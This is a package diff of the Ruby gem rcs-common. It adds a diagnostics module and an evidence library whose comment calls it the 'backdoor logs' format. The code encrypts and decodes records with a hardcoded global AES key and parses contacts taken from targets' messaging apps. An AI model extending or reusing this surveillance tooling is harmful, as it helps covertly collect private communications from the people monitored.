rcs-common 9.6.0

data/lib/rcs-common/diagnosticable.rb

@@ -0,0 +1,136 @@
+require 'sys/filesystem'
+require 'rcs-common/fixnum'
+
+module RCS
+  module Diagnosticable
+    def execution_directory
+      File.expand_path(Dir.pwd)
+    end
+
+    def log_path
+      File.expand_path("./log", execution_directory)
+    end
+
+    def grouped_logs(glob: "#{log_path}/*", deepness: 2)
+      groups = Hash.new { |h, k| h[k] = [] }
+      regexp = /(rcs\-.+)\_\d{4}-\d{2}-\d{2}\.log|(mongo..log)/
+
+      Dir[glob].each do |path|
+        filename = File.basename(path)
+        group_name = filename.scan(regexp).flatten.compact.first
+        groups[group_name] << path if group_name
+      end
+
+      groups.keys.each do |group_name|
+        groups[group_name].sort! { |p1, p2| File.mtime(p2).to_i <=> File.mtime(p1).to_i }
+        groups[group_name] = groups[group_name][0..deepness - 1]
+      end
+
+      groups
+    end
+
+    def pretty_print(hash, out = $stdout)
+      string = JSON.pretty_generate(hash)
+      string = hide_addresses(string)
+      out.write(string)
+      out.write("\n")
+    end
+
+    def change_trace_level(level)
+      trace_yaml = "#{execution_directory}/config/trace.yaml"
+      raise "Unable to find file #{trace_yaml}" unless File.exists?(trace_yaml)
+      content = File.read(trace_yaml)
+      content.gsub!(/(name\s*:\s*logfile\n\s*level\s*:\s*)[A-Z]+/, '\1'+level.to_s.upcase)
+      File.open(trace_yaml, "wb") { |f| f.write(content) }
+    end
+
+    def get_version_info
+      version = File.read("#{execution_directory}/config/VERSION")
+      build = File.read("#{execution_directory}/config/VERSION_BUILD")
+      return version, build
+    end
+
+    def relevant_logs
+      list = grouped_logs.values + grouped_logs(glob: "#{log_path}/err/*", deepness: 7).values
+      list.flatten!
+      list
+    end
+
+    def windows?
+      RbConfig::CONFIG['host_os'] =~ /mingw/
+    end
+
+    def os_lang
+      return unless windows?
+      result = `reg query \"HKLM\\system\\controlset001\\control\\nls\\language\" /v Installlanguage`
+      result.scan(/REG_SZ\s*(.{4})/).flatten.first
+    end
+
+    def command_output(name)
+      cmd = (name =~ /rcs\-/) ? "ruby #{execution_directory}/bin/#{name}" : name
+      output = `#{cmd}`
+      "Output of command #{name}\n#{output}\n\n"
+    end
+
+    def config_files
+      paths = []
+      %w[VERSION VERSION_BUILD certs/*.crt certs/*.pem certs/*.key *.yaml *.lic *.crt *.pem gapi].each do |glob|
+        paths += Dir["#{execution_directory}/config/#{glob}"]
+      end
+      paths.flatten!
+      paths.uniq!
+      paths
+    end
+
+    def machine_info
+      hash = {}
+      keys = %w[build_os build_vendor build_cpu build RUBY_VERSION_NAME]
+      hash['rbconfig'] = RbConfig::CONFIG.reject { |key| !keys.include?(key) }
+      hash['os_lang'] = os_lang
+      hash['gem_list'] = `gem list`.split("\n")
+      hash['ENV'] = ENV.reject { |key| !%w[RUBY_VERSION PWD].include?(key) }
+
+      fs = Sys::Filesystem.stat(windows? ? "#{Dir.pwd[0]+":\\"}" : "/")
+
+      hash['filesystem'] = {
+        'path' => fs.path,
+        'size' => (fs.blocks * fs.block_size).to_s_bytes,
+        'free' => (fs.blocks_free * fs.block_size).to_s_bytes,
+      }
+      hash
+    end
+
+    # Get the state (running, stopped, etc.) and the configuration information
+    # of all the Windows services that start with "RCS"
+    def services_state
+      states = ""
+      config = ""
+
+      `sc query state= all`.split("SERVICE_NAME:").each do |info|
+        name = info.scan(/\s*(.+)\n/).flatten.first
+
+        if name =~ /^rcs/i
+          state = info.scan(/STATE\s+:\s+\d+\s*(.+)\s*/).flatten.first
+          states << "#{name}: #{state}\n"
+          config << `sc qc #{name}`.scan(/SERVICE_NAME:\s*(.*)/m).flatten.last.to_s
+        end
+      end
+
+      return "#{states}\n#{config}"
+    end
+
+    def huge_log?(path)
+      File.size(path) > 52428800 # 50 megabytes
+    end
+
+    def hide_addresses(string)
+      if $options.respond_to?(:[]) and $options[:hide_addresses]
+        mask = "###.###.###.###"
+        string.gsub!(/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/, mask)
+        string.gsub!(/([a-zA-Z0-9\-\.]+)\:(4444|443|80|2701\d)/, mask+':\2')
+      end
+
+      string
+    end
+  end
+end

data/lib/rcs-common/evidence.rb

@@ -0,0 +1,261 @@
+#
+# Evidence factory (backdoor logs)
+#
+
+# relatives
+require_relative 'crypt'
+require_relative 'time'
+require_relative 'utf16le'
+require_relative 'evidence/common'
+
+# RCS::Common
+require 'rcs-common/trace'
+require 'rcs-common/crypt'
+require 'rcs-common/utf16le'
+
+# system
+require 'securerandom'
+
+Dir[File.dirname(__FILE__) + '/evidence/*.rb'].each do |file|
+  require file
+end
+
+module RCS
+
+class Evidence
+  
+  extend Crypt
+  include Crypt
+  include RCS::Tracer
+  
+  attr_reader :binary
+  attr_reader :size
+  attr_reader :content
+  attr_reader :name
+  attr_reader :timestamp
+  attr_reader :info
+  attr_reader :version
+  attr_reader :type
+  attr_writer :info
+
+  GLOBAL_KEY = "\xab\x12\xcd\x34\xef\x56\x01\x23\x45\x67\x89\xab\xcd\xef\x00\x11"
+
+  def self.version_id
+    2008121901
+  end
+  
+  #def clone
+  #  return Evidence.new(@key, @info)
+  #end
+  
+  def initialize(key)
+    @key = key
+    @version = Evidence.version_id
+  end
+  
+  def extend_on_type(type)
+    extend instance_eval "#{type.to_s.capitalize}Evidence"
+  end
+  
+  def extend_on_typeid(id)
+    extend_on_type EVIDENCE_TYPES[id]
+  end
+  
+  def generate_header(type_id, info)
+    tlow, thigh = info[:da].to_filetime
+    deviceid_utf16 = info[:device_id].to_utf16le_binary
+    userid_utf16 = info[:user_id].to_utf16le_binary
+    sourceid_utf16 = info[:source_id].to_utf16le_binary
+
+    add_header = ''
+
+    if respond_to?(:additional_header)
+      header = info.delete(:header)
+      add_header = header ? additional_header(header) : additional_header
+    end
+
+    additional_size = add_header.bytesize
+    struct = [Evidence.version_id, type_id, thigh, tlow, deviceid_utf16.bytesize, userid_utf16.bytesize, sourceid_utf16.bytesize, additional_size]
+    header = struct.pack("I*")
+    
+    header += deviceid_utf16
+    header += userid_utf16
+    header += sourceid_utf16
+    header += add_header.to_binary
+    
+    return header
+  end
+  
+  def align_to_block_len(len)
+    rest = len % 16
+    len += (16 - rest % 16) unless rest == 0
+    len
+  end
+  
+  def encrypt(data)
+    rest = align_to_block_len(data.bytesize) - data.bytesize
+    data += "a" * rest
+    return aes_encrypt(data, @key, PAD_NOPAD)
+  end
+  
+  def decrypt(data)
+    return aes_decrypt(data, @key, PAD_NOPAD)
+  end
+  
+  def append_data(data, len = data.bytesize)
+    [len].pack("I") + data
+  end
+  
+  # factory to create a random evidence
+  def generate(type, common_info)
+    @name =  SecureRandom.hex(16)
+    info = Hash[common_info]
+    info[:da] = Time.now.utc
+    info[:type] = type
+
+    # extend class on requested type
+    extend_on_type info[:type]
+
+    # header
+    type_id = EVIDENCE_TYPES.invert[type]
+    header = generate_header(type_id, info)
+    @binary = append_data(encrypt(header))
+
+    # content
+    if respond_to? :generate_content
+      content = info.delete(:content)
+      chunks = content ? generate_content(content) : generate_content
+      chunks.each do | c |
+        @binary += append_data( encrypt(c), c.bytesize )
+      end
+    end
+    
+    return self
+  end
+  
+  def size
+    @binary.bytesize
+  end
+  
+  # save the file in the specified dir
+  def dump_to_file(dir)
+    # dump the file (using the @name) in the 'dir'
+    File.open(dir + '/' + @name, "wb") do |f|
+      f.write(@binary)
+    end
+  end
+  
+  # load an evidence from a file
+  def load_from_file(file)
+    # load the content of the file in @content
+    File.open(file, "rb") do |f|
+      @binary = f.read
+      @name = File.basename f
+    end
+    
+    return self
+  end
+
+  def read_uint32(data)
+    data.read(4).unpack("L").shift
+  end
+
+  def empty?(binary_string, header_length)
+    (binary_string.size == header_length + 4)
+  end
+
+  def deserialize(data)
+    
+    raise EvidenceDeserializeError.new("no content!") if data.nil?
+    binary_string = StringIO.new data
+    
+    # header
+    header_length = read_uint32(binary_string)
+    
+    # check if we need to apply the global key (evidence is being imported)
+    if (header_length & 0x80000000) == 0x80000000
+      trace :debug, "USING GLOBAL KEY FOR EVIDENCE DECODING!"
+      @key = GLOBAL_KEY
+      header_length &= ~0x80000000
+    end
+    
+    # if empty evidence, raise
+    raise EmptyEvidenceError.new("empty evidence") if empty?(binary_string, header_length)
+    
+    # decrypt header
+    header_string = StringIO.new decrypt(binary_string.read header_length)
+    @version = read_uint32(header_string)
+    @type_id = read_uint32(header_string)
+    time_h = read_uint32(header_string)
+    time_l = read_uint32(header_string)
+    host_size = read_uint32(header_string)
+    user_size = read_uint32(header_string)
+    ip_size = read_uint32(header_string)
+    additional_size = read_uint32(header_string)
+    
+    # check that version is correct
+    raise EvidenceDeserializeError.new("mismatching version [expected #{Evidence.version_id}, found #{@version}]") unless @version == Evidence.version_id
+
+    common_info = Hash.new
+    common_info[:dr] = Time.new.getgm
+    common_info[:da] = Time.from_filetime(time_h, time_l).getgm
+
+    common_info[:device] = header_string.read(host_size).utf16le_to_utf8 unless host_size == 0
+    common_info[:device] ||= ''
+    common_info[:user] = header_string.read(user_size).utf16le_to_utf8 unless user_size == 0
+    common_info[:user] ||= ''
+    common_info[:source] = header_string.read(ip_size).utf16le_to_utf8 unless ip_size == 0
+    common_info[:source] ||= ''
+
+    # extend class depending on evidence type
+    begin
+      common_info[:type] = EVIDENCE_TYPES[ @type_id ].to_s.downcase
+      extend_on_type common_info[:type]
+    rescue Exception => e
+      puts e.message
+      raise EvidenceDeserializeError.new("unknown type => #{@type_id.to_s(16)}, #{e.message}")
+    end
+
+    additional_data = header_string.read additional_size if additional_size > 0
+
+    yield additional_data if block_given?
+
+    # split content to chunks
+    chunks = Array.new
+    if common_info[:type] == 'command'
+      chunks << [binary_string.read]
+    else
+      until binary_string.eof?
+        len = read_uint32(binary_string)
+        content = binary_string.read align_to_block_len(len)
+
+        decoded_chunk = nil
+
+        begin
+          decoded_chunk = StringIO.new(decrypt(content)).read(len)
+        rescue Exception => ex
+          yield(chunks.join) if block_given?
+          raise EvidenceDeserializeError.new("Unable to decrypt chunck #{chunks.size}. Expected length is #{len}, content bytesize is #{content.bytesize}. #{ex.message}")
+        end
+
+        chunks << decoded_chunk
+      end
+    end
+
+    yield chunks.join if block_given?
+
+    # decode additional header
+    if respond_to? :decode_additional_header and additional_size != 0
+      additional_info = decode_additional_header(additional_data)
+      common_info.merge!(additional_info)
+    end
+
+    # decode evidence body
+    evidences = Array.new
+    action = decode_content(common_info, chunks) {|ev| evidences << ev}
+
+    return evidences, action
+  end
+end
+
+end # RCS::

data/lib/rcs-common/evidence/addressbook.rb

@@ -0,0 +1,173 @@
+require 'rcs-common/evidence/common'
+require 'rcs-common/serializer'
+
+module RCS
+
+  module AddressbookEvidence
+    def content
+      fields = { :first_name => ["John", "Liza", "Bruno"].sample,
+                 :last_name => ["Doe", "Rossi", "Bianchi"].sample,
+                 :mobile_phone_number => "+393380123456",
+                 :home_phone_number => "+39024567890",
+                 :email_1 => "test@me.com"}
+      AddressBookSerializer.new.serialize fields
+    end
+
+    def generate_content
+      [ content ]
+    end
+
+    def decode_content(common_info, chunks)
+      stream = StringIO.new chunks.join
+
+      until stream.eof?
+        info = Hash[common_info]
+        info[:data] ||= Hash.new
+
+        contact = AddressBookSerializer.new.unserialize stream
+
+        info[:data][:name] = contact.name
+        info[:data][:contact] = contact.contact
+        info[:data][:info] = contact.info
+        info[:data][:program] = contact.program
+        info[:data][:type] = contact.type
+        info[:data][:handles] = contact.handles unless contact.handles.empty?
+
+        yield info if block_given?
+      end
+      :delete_raw
+    end
+  end # ::AddressbookEvidence
+
+  module IaddressbookEvidence
+
+    VERSION_2 = 0x10000000
+    CONTACTLIST = 0x0000C021
+    CONTACTFILE = 0x0000C022
+
+    LOCAL_CONTACT = 0x80000000
+
+    PROGRAM_WHATSAPP = 0x00000001
+    PROGRAM_SKYPE = 0x00000002
+    PROGRAM_VIBER = 0x00000004
+    PROGRAM_MESSAGES = 0x00000008
+    PROGRAM_LINE = 0x00000010
+
+    def content
+      header = StringIO.new
+      header.write [CONTACTLIST | VERSION_2].pack('L')
+      header.write [0].pack('L')   # len (ignored)
+      header.write [1].pack('L')   # num records
+
+      header.write [CONTACTFILE].pack('L')
+      header.write [LOCAL_CONTACT].pack('L')   # flags
+      header.write [0].pack('L')   # len (ignored)
+
+      name = "FirstName".to_utf16le_binary_null
+      write_name(header, name)
+
+      name = "LastName".to_utf16le_binary_null
+      write_name(header, name)
+
+      header.write [CONTACTFILE].pack('L')
+      header.write [1].pack('L')   # num_contacts
+
+      name = "+39123456789".to_utf16le_binary_null
+      write_number(header, name)
+
+      header.string
+    end
+
+    def generate_content
+      [content]
+    end
+
+    def decode_content(common_info, chunks)
+      stream = StringIO.new chunks.join
+
+      # ABLogStruct
+      magic_ver = read_uint32 stream
+      raise EvidenceDeserializeError.new("invalid log version for IADDRESSBOOK [#{magic_ver} != #{CONTACTLIST}]") unless magic_ver == CONTACTLIST or magic_ver == (CONTACTLIST | VERSION_2)
+
+      stream.read(4) # len, ignore
+      num_records = read_uint32 stream
+
+      (0..num_records-1).each do |i|
+
+        info = Hash[common_info]
+        info[:data] ||= Hash.new
+        info[:data][:program] = :phone
+
+        # ABFile
+        magic = read_uint32 stream
+        raise EvidenceDeserializeError.new("invalid log version for IADDRESSBOOK [#{magic} != #{CONTACTFILE}]") unless magic == CONTACTFILE
+        flags = read_uint32(stream) if (magic_ver & VERSION_2 != 0)
+
+        info[:data][:type] = :target if (flags & LOCAL_CONTACT != 0)
+        info[:data][:program] = :whatsapp if (flags & PROGRAM_WHATSAPP != 0)
+        info[:data][:program] = :skype if (flags & PROGRAM_SKYPE != 0)
+        info[:data][:program] = :viber if (flags & PROGRAM_VIBER != 0)
+        info[:data][:program] = :line if (flags & PROGRAM_LINE != 0)
+        info[:data][:program] = :messages if (flags & PROGRAM_MESSAGES != 0)
+
+        len = read_uint32 stream
+
+        #ABName (first name)
+        first_name = read_name(stream)
+
+        #ABName (last name)
+        last_name = read_name(stream)
+
+        info[:data][:name] = "#{first_name} #{last_name}"
+
+        #ABContacts
+        magic = read_uint32 stream
+        num_contacts = read_uint32 stream
+
+        (0..num_contacts-1).each do |i|
+          type, number = read_number(stream)
+          case type
+            when 0
+              info[:data][:info] ||= number.delete(' ')
+              info[:data][:handle] = number.delete(' ')
+            else
+              info[:data][:info] += "#{number}\n"
+          end
+        end
+
+        trace :debug, "IADDRESSBOOK #{info[:data]}"
+
+        yield info if block_given?
+      end
+
+      :keep_raw
+    end
+
+    def read_name(stream)
+      magic = read_uint32 stream
+      len = read_uint32 stream
+      stream.read(len).utf16le_to_utf8
+    end
+
+    def write_name(stream, name)
+      stream.write [CONTACTFILE].pack('L')
+      stream.write [name.bytesize].pack('L')
+      stream.write name
+    end
+
+    def read_number(stream)
+      magic = read_uint32 stream
+      type = read_uint32 stream
+      name = read_name(stream)
+      return type, name
+    end
+
+    def write_number(stream, number)
+      stream.write [CONTACTFILE].pack('L')
+      stream.write [0].pack('L') # type
+      write_name(stream, number)
+    end
+
+  end # ::IAddressbookEvidence
+
+end # ::RCS